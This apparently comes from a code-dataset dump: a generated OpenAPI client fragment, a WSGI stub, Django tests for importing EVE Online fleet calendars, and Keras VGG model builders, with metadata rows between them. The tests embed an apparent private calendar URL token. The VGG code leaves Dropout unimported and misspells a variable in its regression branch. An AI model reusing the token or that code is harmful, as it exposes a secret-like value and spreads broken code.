'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'namespace':
(str,),
'name':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'namespace': 'namespace',
'name': 'name',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'namespace': 'path',
'name': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_output_artifact
)
def __get_output_artifact_by_uid(
self,
uid,
node_id,
artifact_name,
**kwargs
):
"""Get an output artifact by UID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_output_artifact_by_uid(uid, node_id, artifact_name, async_req=True)
>>> result = thread.get()
Args:
uid (str):
node_id (str):
artifact_name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['uid'] = \
uid
kwargs['node_id'] = \
node_id
kwargs['artifact_name'] = \
artifact_name
return self.call_with_http_info(**kwargs)
self.get_output_artifact_by_uid = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerToken'
],
'endpoint_path': '/artifacts-by-uid/{uid}/{nodeId}/{artifactName}',
'operation_id': 'get_output_artifact_by_uid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'uid',
'node_id',
'artifact_name',
],
'required': [
'uid',
'node_id',
'artifact_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'uid':
(str,),
'node_id':
(str,),
'artifact_name':
(str,),
},
'attribute_map': {
'uid': 'uid',
'node_id': 'nodeId',
'artifact_name': 'artifactName',
},
'location_map': {
'uid': 'path',
'node_id': 'path',
'artifact_name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_output_artifact_by_uid
)
| 35.647713 | 206 | 0.436145 | 2,315 | 28,839 | 5.164579 | 0.086393 | 0.025092 | 0.023419 | 0.03011 | 0.874791 | 0.86375 | 0.849364 | 0.844179 | 0.834644 | 0.800268 | 0 | 0.002783 | 0.476785 | 28,839 | 808 | 207 | 35.691832 | 0.789582 | 0.2782 | 0 | 0.714783 | 0 | 0 | 0.229307 | 0.047275 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010435 | false | 0 | 0.008696 | 0 | 0.029565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8384e02a6cb1a50677165593cb59c4ab065b159b | 101 | wsgi | Python | src/conf/application.wsgi | r-d-w/passwd-if | 3f56d02ef207ff724855f6ad44f3f8bdda732265 | [
"Apache-2.0"
] | null | null | null | src/conf/application.wsgi | r-d-w/passwd-if | 3f56d02ef207ff724855f6ad44f3f8bdda732265 | [
"Apache-2.0"
] | null | null | null | src/conf/application.wsgi | r-d-w/passwd-if | 3f56d02ef207ff724855f6ad44f3f8bdda732265 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path.insert(0, "/opt/passwd_if")
from application.passwd_if import app as application | 25.25 | 52 | 0.80198 | 17 | 101 | 4.647059 | 0.705882 | 0.202532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.09901 | 101 | 4 | 52 | 25.25 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.666667 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
83a82a2ff441e23ffb496f847c3955f07784d272 | 20,206 | py | Python | opcalendar/tests/test_tasks.py | buahaha/allianceauth-opcalendar | 44e50e06eac4b5c0e6b809e5ca2638af5e49145f | [
"MIT"
] | null | null | null | opcalendar/tests/test_tasks.py | buahaha/allianceauth-opcalendar | 44e50e06eac4b5c0e6b809e5ca2638af5e49145f | [
"MIT"
] | null | null | null | opcalendar/tests/test_tasks.py | buahaha/allianceauth-opcalendar | 44e50e06eac4b5c0e6b809e5ca2638af5e49145f | [
"MIT"
] | null | null | null | import datetime as dt
from unittest.mock import patch
from pytz import utc
import requests
import requests_mock
from allianceauth.tests.auth_utils import AuthUtils
from ..models import Event, EventCategory, EventHost, EventImport
from .. import tasks
from .testdata import feedparser_parse, generate_ical_string
from ..utils import NoSocketsTestCase
MODULE_PATH = "opcalendar.tasks"
@patch(MODULE_PATH + ".feedparser")
@requests_mock.Mocker()
class TestImportNpsiFleet(NoSocketsTestCase):
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.user = AuthUtils.create_user("Bruce Wayne")
cls.eve_character = AuthUtils.add_main_character_2(
cls.user, "Bruce Wayne", 1001, 2001
)
cls.host = EventHost.objects.create(community="Test Host")
cls.category = EventCategory.objects.create(
name="NPSI", ticker="NPSI", color=EventCategory.COLOR_PURPLE
)
########################
# spectre fleets only
def test_should_add_new_spectre_fleet_event(self, mock_feedparser, requests_mocker):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
obj = Event.objects.first()
self.assertEqual(obj.operation_type, self.category)
self.assertEqual(obj.title, "Spectre Fleet 1")
self.assertEqual(obj.host, self.host)
self.assertEqual(obj.doctrine, "see details")
self.assertEqual(obj.formup_system, EventImport.SPECTRE_FLEET)
self.assertEqual(obj.description, "")
published = utc.localize(dt.datetime(2021, 2, 5, 21, 0))
self.assertEqual(obj.start_time, published)
self.assertEqual(obj.end_time, published)
self.assertEqual(obj.fc, EventImport.SPECTRE_FLEET)
self.assertEqual(obj.visibility, Event.VISIBILITY_EXTERNAL)
self.assertEqual(obj.user, self.user)
self.assertEqual(obj.eve_character, self.eve_character)
def test_should_add_new_spectre_fleet_event_no_character(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertTrue(Event.objects.filter(title="Spectre Fleet 1").exists())
def test_should_not_replace_existing_spectre_fleet_event(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
published = utc.localize(dt.datetime(2021, 2, 5, 21, 0))
original_event = Event.objects.create(
operation_type=self.category,
title="Spectre Fleet 1",
host=self.host,
doctrine="see details",
formup_system=EventImport.SPECTRE_FLEET,
description="Testing Eve Uni class 1",
start_time=published,
end_time=published,
fc=EventImport.SPECTRE_FLEET,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
self.assertTrue(Event.objects.filter(pk=original_event.pk).exists())
def test_should_delete_outdated_spectre_fleet_event(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse = lambda x: feedparser_parse("no-data")
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
published = utc.localize(dt.datetime(2021, 2, 3, 21, 0))
Event.objects.create(
operation_type=self.category,
title="Spectre Fleet OLD",
host=self.host,
doctrine="see details",
formup_system=EventImport.SPECTRE_FLEET,
description="Testing Eve Uni class OLD",
start_time=published,
end_time=published,
fc=EventImport.SPECTRE_FLEET,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_spectre_fleet_has_error(
self, mock_feedparser, requests_mocker
):
# given
mock_feedparser.parse.side_effect = RuntimeError
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
########################
# fun inc only
def test_should_add_new_fun_inc_event(self, mock_feedparser, requests_mocker):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
obj = Event.objects.first()
self.assertEqual(obj.operation_type, self.category)
self.assertEqual(obj.title, "Fun Fleet 1")
self.assertEqual(obj.host, self.host)
self.assertEqual(obj.doctrine, "see details")
self.assertEqual(obj.formup_system, EventImport.FUN_INC)
self.assertEqual(obj.description, "Testing Fun Fleet 1")
self.assertEqual(obj.start_time, utc.localize(dt.datetime(2021, 2, 5, 22, 0)))
self.assertEqual(obj.end_time, utc.localize(dt.datetime(2021, 2, 5, 23, 0)))
self.assertEqual(obj.fc, EventImport.FUN_INC)
self.assertEqual(obj.visibility, Event.VISIBILITY_EXTERNAL)
self.assertEqual(obj.user, self.user)
self.assertEqual(obj.eve_character, self.eve_character)
def test_should_add_new_fun_inc_event_no_character(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertTrue(Event.objects.filter(title="Fun Fleet 1").exists())
def test_should_not_replace_existing_fun_inc_event(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
original_event = Event.objects.create(
operation_type=self.category,
title="Fun Fleet 1",
host=self.host,
doctrine="see details",
formup_system=EventImport.FUN_INC,
description="Testing Fun Fleet 1",
start_time=utc.localize(dt.datetime(2021, 2, 5, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 5, 23, 0)),
fc=EventImport.FUN_INC,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
self.assertTrue(Event.objects.filter(pk=original_event.pk).exists())
def test_should_delete_outdated_fun_inc_event(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("no-data"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
Event.objects.create(
operation_type=self.category,
title="Fun Fleet OLD",
host=self.host,
doctrine="see details",
formup_system=EventImport.FUN_INC,
description="Testing Fun Fleet OLD",
start_time=utc.localize(dt.datetime(2021, 2, 4, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 4, 23, 0)),
fc=EventImport.FUN_INC,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_fun_inc_calendar_is_invalid(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text="",
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_fun_inc_calendar_request_has_error(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
exc=requests.exceptions.ConnectTimeout,
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
########################
# eve uni only
def test_should_add_new_eve_uni_event(self, mock_feedparser, requests_mocker):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
obj = Event.objects.first()
self.assertEqual(obj.operation_type, self.category)
self.assertEqual(obj.title, "Eve Uni class 1")
self.assertEqual(obj.host, self.host)
self.assertEqual(obj.doctrine, "see details")
self.assertEqual(obj.formup_system, EventImport.EVE_UNIVERSITY)
self.assertEqual(obj.description, "Testing Eve Uni class 1")
self.assertEqual(obj.start_time, utc.localize(dt.datetime(2021, 2, 4, 22, 0)))
self.assertEqual(obj.end_time, utc.localize(dt.datetime(2021, 2, 4, 23, 0)))
self.assertEqual(obj.fc, EventImport.EVE_UNIVERSITY)
self.assertEqual(obj.visibility, Event.VISIBILITY_EXTERNAL)
self.assertEqual(obj.user, self.user)
self.assertEqual(obj.eve_character, self.eve_character)
def test_should_add_new_eve_uni_event_no_character(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertTrue(Event.objects.filter(title="Eve Uni class 1").exists())
def test_should_not_replace_existing_eve_uni_event(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
original_event = Event.objects.create(
operation_type=self.category,
title="Eve Uni class 1",
host=self.host,
doctrine="see details",
formup_system=EventImport.EVE_UNIVERSITY,
description="Testing Eve Uni class 1",
start_time=utc.localize(dt.datetime(2021, 2, 4, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 4, 23, 0)),
fc=EventImport.EVE_UNIVERSITY,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 1)
self.assertTrue(Event.objects.filter(pk=original_event.pk).exists())
def test_should_delete_outdated_eve_uni_events(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("no-data"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
Event.objects.create(
operation_type=self.category,
title="Eve Uni class OLD",
host=self.host,
doctrine="see details",
formup_system=EventImport.EVE_UNIVERSITY,
description="Testing Eve Uni class OLD",
start_time=utc.localize(dt.datetime(2021, 2, 3, 22, 0)),
end_time=utc.localize(dt.datetime(2021, 2, 3, 23, 0)),
fc=EventImport.EVE_UNIVERSITY,
external=True,
user=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_eve_uni_request_has_error(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
exc=requests.exceptions.ConnectTimeout,
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
def test_should_report_when_eve_uni_calendar_is_invalid(
self, mock_feedparser, requests_mocker
):
# given
requests_mocker.register_uri(
"GET", url="https://portal.eveuniversity.org/api/getcalendar", text=""
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
result = tasks.import_all_npsi_fleets()
# then
self.assertFalse(result)
self.assertEqual(Event.objects.count(), 0)
########################
# multiple fleet types
def test_should_add_fleet_events_all_types(self, mock_feedparser, requests_mocker):
# given
mock_feedparser.parse = feedparser_parse
EventImport.objects.create(
source=EventImport.SPECTRE_FLEET,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
requests_mocker.register_uri(
"GET",
url="https://calendar.google.com/calendar/ical/og3uh76l8ul3dfgbie03fbbgs8%40group.calendar.google.com/private-f466889b44741fd7249e99e21ac171ff/basic.ics",
text=generate_ical_string("fun_inc"),
)
EventImport.objects.create(
source=EventImport.FUN_INC,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
requests_mocker.register_uri(
"GET",
url="https://portal.eveuniversity.org/api/getcalendar",
text=generate_ical_string("eve_uni"),
)
EventImport.objects.create(
source=EventImport.EVE_UNIVERSITY,
host=self.host,
operation_type=self.category,
creator=self.user,
eve_character=self.eve_character,
)
# when
tasks.import_all_npsi_fleets()
# then
self.assertEqual(Event.objects.count(), 3)
self.assertTrue(Event.objects.filter(title="Spectre Fleet 1").exists())
self.assertTrue(Event.objects.filter(title="Fun Fleet 1").exists())
self.assertTrue(Event.objects.filter(title="Eve Uni class 1").exists())
| 36.939671 | 166 | 0.619717 | 2,158 | 20,206 | 5.592215 | 0.075533 | 0.052701 | 0.053696 | 0.060076 | 0.929897 | 0.920948 | 0.907027 | 0.899486 | 0.889045 | 0.868578 | 0 | 0.027476 | 0.279521 | 20,206 | 546 | 167 | 37.007326 | 0.801484 | 0.01752 | 0 | 0.738462 | 0 | 0.015385 | 0.103468 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.041758 | false | 0 | 0.191209 | 0 | 0.235165 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7a3275ad6269ffd8dca8b5d6b47b271034fabe8 | 11,222 | py | Python | ext/ANTsPyNet/antspynet/architectures/create_vgg_model.py | tsmonteiro/fmri_proc | ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1 | [
"MIT"
] | 2 | 2021-11-16T10:00:33.000Z | 2021-12-13T02:57:40.000Z | ext/ANTsPyNet/antspynet/architectures/create_vgg_model.py | tsmonteiro/fmri_proc | ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1 | [
"MIT"
] | null | null | null | ext/ANTsPyNet/antspynet/architectures/create_vgg_model.py | tsmonteiro/fmri_proc | ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1 | [
"MIT"
] | 1 | 2021-12-13T02:57:27.000Z | 2021-12-13T02:57:27.000Z |
from keras.models import Model
from keras.layers import (Input, Flatten, Dense,
Conv2D, Conv2DTranspose, MaxPooling2D,
ZeroPadding2D,
Conv3D, Conv3DTranspose, MaxPooling3D,
ZeroPadding3D)
def create_vgg_model_2d(input_image_size,
number_of_classification_labels=1000,
layers=(1, 2, 3, 4, 4),
lowest_resolution=64,
convolution_kernel_size=(3, 3),
pool_size=(2, 2),
strides=(2, 2),
number_of_dense_units=4096,
dropout_rate=0.0,
style=19,
mode='classification'):
"""
2-D implementation of the Vgg deep learning architecture.
Creates a keras model of the Vgg deep learning architecture for image
recognition based on the paper
K. Simonyan and A. Zisserman, Very Deep Convolutional Networks for
Large-Scale Image Recognition
available here:
https://arxiv.org/abs/1409.1556
This particular implementation was influenced by the following python
implementation:
https://gist.github.com/baraldilorenzo/8d096f48a1be4a2d660d
Arguments
---------
input_image_size : tuple of length 3
Used for specifying the input tensor shape. The shape (or dimension) of
that tensor is the image dimensions followed by the number of channels
(e.g., red, green, and blue).
number_of_classification_labels : integer
Number of classification labels.
layers : tuple
A tuple determining the number of 'filters' defined at for each layer.
lowest_resolution : integer
Number of filters at the beginning.
convolution_kernel_size : tuple
2-d vector definining the kernel size during the encoding path
pool_size : tuple
2-d vector defining the region for each pooling layer.
strides : tuple
2-d vector describing the stride length in each direction.
number_of_dense_units : integer
Number of units in the last layers.
dropout_rate : scalar
Between 0 and 1 to use between dense layers.
style : integer
'16' or '19' for VGG16 or VGG19, respectively.
mode : string
'classification' or 'regression'. Default = 'classification'.
Returns
-------
Keras model
A 2-D Keras model defining the network.
Example
-------
>>> model = create_vgg_model_2d((128, 128, 1))
>>> model.summary()
"""
if style != 16 and style != 19:
raise ValueError("Incorrect style. Must be either '16' or '19'.")
inputs = Input(shape = input_image_size)
outputs = None
for i in range(len(layers)):
number_of_filters = lowest_resolution * 2**(layers[i] - 1)
if i == 0:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(inputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
elif i == 1:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
else:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
if style == 19:
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = MaxPooling2D(pool_size=pool_size,
strides=strides)(outputs)
outputs = Flatten()(outputs)
outputs = Dense(units=number_of_dense_units,
activation ='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
outputs = Dense(units=number_of_dense_units,
activation ='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
layer_activation = ''
if mode == 'classification':
layer_activation = 'softmax'
elif mode == 'regression':
layerActivation = 'linear'
else:
raise ValueError('unrecognized mode.')
outputs = Dense(units=number_of_classification_labels,
activation =layer_activation)(outputs)
vgg_model = Model(inputs=inputs, outputs=outputs)
return(vgg_model)
def create_vgg_model_3d(input_image_size,
number_of_classification_labels=1000,
layers=(1, 2, 3, 4, 4),
lowest_resolution=64,
convolution_kernel_size=(3, 3, 3),
pool_size=(2, 2, 2),
strides=(2, 2, 2),
number_of_dense_units=4096,
dropout_rate=0.0,
style=19,
mode='classification'):
"""
3-D implementation of the Vgg deep learning architecture.
Creates a keras model of the Vgg deep learning architecture for image
recognition based on the paper
K. Simonyan and A. Zisserman, Very Deep Convolutional Networks for
Large-Scale Image Recognition
available here:
https://arxiv.org/abs/1409.1556
This particular implementation was influenced by the following python
implementation:
https://gist.github.com/baraldilorenzo/8d096f48a1be4a2d660d
Arguments
---------
input_image_size : tuple of length 4
Used for specifying the input tensor shape. The shape (or dimension) of
that tensor is the image dimensions followed by the number of channels
(e.g., red, green, and blue).
number_of_classification_labels : integer
Number of classification labels.
layers : tuple
A tuple determining the number of 'filters' defined at for each layer.
lowest_resolution : integer
Number of filters at the beginning.
convolution_kernel_size : tuple
3-d vector definining the kernel size during the encoding path
pool_size : tuple
3-d vector defining the region for each pooling layer.
strides : tuple
3-d vector describing the stride length in each direction.
number_of_dense_units : integer
Number of units in the last layers.
dropout_rate : scalar
Between 0 and 1 to use between dense layers.
style : integer
'16' or '19' for VGG16 or VGG19, respectively.
mode : string
'classification' or 'regression'. Default = 'classification'.
Returns
-------
Keras model
A 3-D Keras model defining the network.
Example
-------
>>> model = create_vgg_model_3d((128, 128, 128, 1))
>>> model.summary()
"""
if style != 16 and style != 19:
raise ValueError("Incorrect style. Must be either '16' or '19'.")
inputs = Input(shape = input_image_size)
outputs = None
for i in range(len(layers)):
number_of_filters = lowest_resolution * 2**(layers[i] - 1)
if i == 0:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(inputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
elif i == 1:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
else:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
if style == 19:
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(outputs)
outputs = MaxPooling3D(pool_size=pool_size,
strides=strides)(outputs)
outputs = Flatten()(outputs)
outputs = Dense(units=number_of_dense_units,
activation ='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
outputs = Dense(units=number_of_dense_units,
activation ='relu')(outputs)
if dropout_rate > 0.0:
outputs = Dropout(rate=dropout_rate)(outputs)
layer_activation = ''
if mode == 'classification':
layer_activation = 'softmax'
elif mode == 'regression':
layerActivation = 'linear'
else:
raise ValueError('unrecognized mode.')
outputs = Dense(units=number_of_classification_labels,
activation =layer_activation)(outputs)
vgg_model = Model(inputs=inputs, outputs=outputs)
return(vgg_model)
| 35.853035 | 80 | 0.556764 | 1,132 | 11,222 | 5.348057 | 0.150177 | 0.055501 | 0.054509 | 0.058143 | 0.961513 | 0.958209 | 0.954741 | 0.954741 | 0.954741 | 0.954741 | 0 | 0.029246 | 0.366245 | 11,222 | 312 | 81 | 35.967949 | 0.821991 | 0.297095 | 0 | 0.897436 | 0 | 0 | 0.049807 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.012821 | 0 | 0.025641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7c511c8618362d12338518c3015a42a1bcae977 | 6,123 | py | Python | tests/func/strands/test_create_strand.py | StrandHQ/strand-api | afa2da651ef9046ea39c044a65bdd88d814838b4 | [
"MIT"
] | 1 | 2018-10-23T16:02:54.000Z | 2018-10-23T16:02:54.000Z | tests/func/strands/test_create_strand.py | StrandHQ/strand-api | afa2da651ef9046ea39c044a65bdd88d814838b4 | [
"MIT"
